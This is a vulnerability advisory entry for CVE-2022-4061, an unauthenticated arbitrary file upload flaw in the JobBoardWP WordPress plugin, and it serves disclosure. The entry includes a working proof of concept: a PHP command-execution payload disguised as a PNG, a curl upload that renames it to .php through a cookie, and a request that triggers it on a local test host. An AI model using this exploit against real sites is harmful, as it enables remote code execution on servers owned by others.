Lucene search
CydaveWPEX-ID:FEC68E6E-F612-43C8-8301-80F7AE3BE665HistoryNov 28, 2022 - 12:00 a.m.
JobBoardWP < 1.2.2 - Unauthenticated Arbitrary File Upload
2022-11-2800:00:00
cydave
161
jobboardwp
unauthenticated
file upload
security
vulnerability
payload
nonce
curl
exploit
EPSS
0.001
Percentile
46.6%
The plugin does not properly validate file names and types in its file upload functionalities, allowing unauthenticated users to upload arbitrary files such as PHP.
Setup:
1. Install the vulnerable plugin (jobboardwp version 1.2.1)
2. In the toast message that appears on the plugin's installation page, create the required pages for the plugin to work properly
Attack:
1. As an unauthenticated user, extract the nonce from the "Jobs" page (by default /?page_id=5), CTRL+F for "jb_front_data"
2. Prepare a payload you want to upload, ensure that the filename ends with ".png":
echo '<?php passthru("id"); ?>' > /tmp/payload.png
3. Invoke the following curl command, with the nonce embedded, to upload the payload:
curl 'http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=jb-upload-company-logo' \
-H 'Cookie: jb-logo-upload=payload.php' \
-F 'nonce=<NONCE>' \
-F 'chunks=1' \
-F 'file=@/tmp/payload.png' \
4. Trigger the payload by accessing it (the location of the payload is returned by the curl command above):
curl 'http://127.0.0.1:7777/wp-content/uploads/jobboardwp/temp/payload.php'Related
wpvulndb
wpvulndb
JobBoardWP < 1.2.2 - Unauthenticated Arbitrary File Upload
2022-11-28 00:00:00
cve
cve
CVE-2022-4061
2022-12-19 14:15:12
cvelist
cvelist
CVE-2022-4061 JobBoardWP < 1.2.2 - Unauthenticated Arbitrary File Upload
2022-12-19 13:41:42
prion
prion
Default credentials
2022-12-19 14:15:00
nvd
nvd
CVE-2022-4061
2022-12-19 14:15:12
githubexploit
githubexploit
Exploit for CVE-2022-4061
2023-09-17 03:20:23